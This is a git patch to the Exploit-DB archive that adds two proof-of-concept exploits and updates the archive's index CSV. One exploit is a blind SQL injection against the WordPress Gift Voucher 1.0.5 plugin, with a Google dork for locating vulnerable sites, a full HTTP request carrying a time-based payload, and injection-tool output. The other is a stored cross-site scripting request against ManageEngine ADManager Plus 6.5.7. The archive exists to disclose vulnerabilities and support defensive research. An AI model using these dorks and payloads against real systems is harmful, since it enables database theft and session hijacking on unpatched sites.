From aaa959b29cbfcace98d0ca55d9d4a9805538304c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 27 Aug 2018 05:01:54 +0000 Subject: [PATCH] DB: 2018-08-27 2 changes to exploits/shellcodes Apache James 2.2 - SMTP Denial of Service Apache James Server 2.2 - SMTP Denial of Service SSH2 3.0 - Restricted Shell Escaping Command Execution SSH2 3.0 - Restricted Shell Escape (Command Execution) WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting --- exploits/php/webapps/45255.txt | 38 +++++++++++++++++ exploits/windows_x86-64/webapps/45256.txt | 50 +++++++++++++++++++++++ files_exploits.csv | 6 ++- 3 files changed, 92 insertions(+), 2 deletions(-) create mode 100644 exploits/php/webapps/45255.txt create mode 100644 exploits/windows_x86-64/webapps/45256.txt diff --git a/exploits/php/webapps/45255.txt b/exploits/php/webapps/45255.txt new file mode 100644 index 000000000..0b719cac8 --- /dev/null +++ b/exploits/php/webapps/45255.txt @@ -0,0 +1,38 @@ +# Exploit Title: WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection +# Google Dork: intext:"/wp-content/plugins/gift-voucher/" +# Date: 2018-08-23 +# Exploit Author: Renos Nikolaou +# Software Link: https://wordpress.org/plugins/gift-voucher/ +# Vendor Homepage: http://www.codemenschen.at/ +# Version: 1.0.5 +# Tested on: Windows 10 +# CVE: N/A +# Description : The vulnerability allows an attacker to inject sql commands +# on 'template_id' parameter. + +# PoC - Blind SQLi : + +POST /wp-admin/admin-ajax.php HTTP/1.1 +Host: domain.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://domain.com/gift-voucher/ +Content-Length: 62 +Cookie: PHPSESSID=efa4of1gq42g0nd9nmj8dska50; __stripe_mid=1f8c5bef-b440-4803-bdd5-f0d0ea22007e; __stripe_sid=de547b6b-fa31-46a1-972b-7b3324272a23 +Connection: close + +action=wpgv_doajax_front_template&template_id=1 and sleep(15)# + +Parameter: template_id (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: action=wpgv_doajax_front_template&template_id=1 AND 4448=4448 + Vector: AND [INFERENCE] +--- +web application technology: Apache +back-end DBMS: MySQL >= 5.0.0 +banner: '5.5.59' \ No newline at end of file diff --git a/exploits/windows_x86-64/webapps/45256.txt b/exploits/windows_x86-64/webapps/45256.txt new file mode 100644 index 000000000..dafd62436 --- /dev/null +++ b/exploits/windows_x86-64/webapps/45256.txt @@ -0,0 +1,50 @@ +# Exploit Title: ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting +# Date: 2018-08-21 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://www.manageengine.com/ +# Hardware Link : https://www.manageengine.com/products/ad-manager/ +# Software : ZOHO Corp ManageEngine ADManager Plus +# Product Version: 6.5.7 +# Vulernability Type : Cross-site Scripting +# Vulenrability : Stored XSS +# CVE : N/A + +# Zoho ManageEngine ADManager Plus 6.5.7 allows XSS on the "Workflow Delegation" "Requesters" screen. + +# HTTP Request Header : + +Request URL: http://TARGET:8080/ADMPTechnicians.do?methodToCall=listTechnicianRows +Request Method: POST +Status Code: 200 OK +Remote Address: TARGET:8080 +Referrer Policy: no-referrer-when-downgrade +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Connection: keep-alive +Content-Length: 320 +Content-type: application/x-www-form-urlencoded;charset=UTF-8 +Cookie: adscsrf=614ff642-779b-41aa-bff5-44370ad770c2; JSESSIONID=3CED862790101335DD0EB05EE42E4972; JSESSIONIDSSO=3E6785DB8D6DFD46D6C729579E68418D +Host: TARGET:8080 +Origin: http://TARGET:8080 +Referer: http://TARGET:8080/Delegation.do?selectedTab=delegation&selectedTile=technicians +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 +X-Requested-With: XMLHttpRequest + +# HTTP Response Header : + +Content-Length: 3753 +Content-Type: text/html;charset=UTF-8 +Date: Tue, 14 Aug 2018 10:14:32 GMT +Server: Apache-Coyote/1.1 +X-Content-Type-Options: nosniff +X-XSS-Protection: 1 + +# Query String Parameters : + +methodToCall: listTechnicianRows + +# Form Data : + +params: {"startIndex":1,"range":10,"searchText":"\">","ascending":true,"isNavigation":false,"adminSelected":false,"isNewRange":false,"sortColumn":FULL_NAME,"typeFilters":"","domainFilters":"","viewType":defaultView} +adscsrf: 614ff642-779b-41aa-bff5-44370ad770c2 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b04c64838..e1b0d535a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3569,7 +3569,7 @@ id,file,description,date,author,type,platform,port 27903,exploits/linux/dos/27903.txt,"Dia 0.8x/0.9x - Filename Remote Format String",2006-05-23,KaDaL-X,dos,linux, 27906,exploits/windows/dos/27906.txt,"Microsoft Internet Explorer 6 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",dos,windows, 27914,exploits/windows/dos/27914.pl,"Alt-N MDaemon 2-8 - IMAP Remote Buffer Overflow",2006-05-29,kcope,dos,windows, -27915,exploits/multiple/dos/27915.pl,"Apache James 2.2 - SMTP Denial of Service",2006-05-29,y3dips,dos,multiple, +27915,exploits/multiple/dos/27915.pl,"Apache James Server 2.2 - SMTP Denial of Service",2006-05-29,y3dips,dos,multiple, 27925,exploits/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",dos,linux, 27930,exploits/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow (PoC)",2006-05-31,Mr.Niega,dos,windows, 27942,exploits/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",dos,hardware, @@ -8286,7 +8286,7 @@ id,file,description,date,author,type,platform,port 21362,exploits/linux/local/21362.c,"Oracle 8i - TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",local,linux, 21373,exploits/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Command Injection",2002-04-11,"Przemyslaw Frasunek",local,openbsd, 21375,exploits/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilities",2002-04-11,"Paul Starzetz",local,linux, -21398,exploits/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,local,linux, +21398,exploits/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escape (Command Execution)",2002-04-18,A.Dimitrov,local,linux, 21407,exploits/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure",2002-04-23,phased,local,bsd, 21408,exploits/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,local,unix, 21414,exploits/unix/local/21414.c,"GNU Screen 3.9.x Braille Module - Local Buffer Overflow",2002-04-23,"Gobbles Security",local,unix, @@ -39856,3 +39856,5 @@ id,file,description,date,author,type,platform,port 45252,exploits/hardware/webapps/45252.txt,"Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)",2018-08-24,cakes,webapps,hardware, 45253,exploits/php/webapps/45253.txt,"UltimatePOS 2.5 - Remote Code Execution",2018-08-25,"Renos Nikolaou",webapps,php, 45254,exploits/windows/webapps/45254.txt,"ManageEngine ADManager Plus 6.5.7 - HTML Injection",2018-08-25,"Ismail Tasdelen",webapps,windows, +45255,exploits/php/webapps/45255.txt,"WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection",2018-08-26,"Renos Nikolaou",webapps,php, +45256,exploits/windows_x86-64/webapps/45256.txt,"ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting",2018-08-26,"Ismail Tasdelen",webapps,windows_x86-64,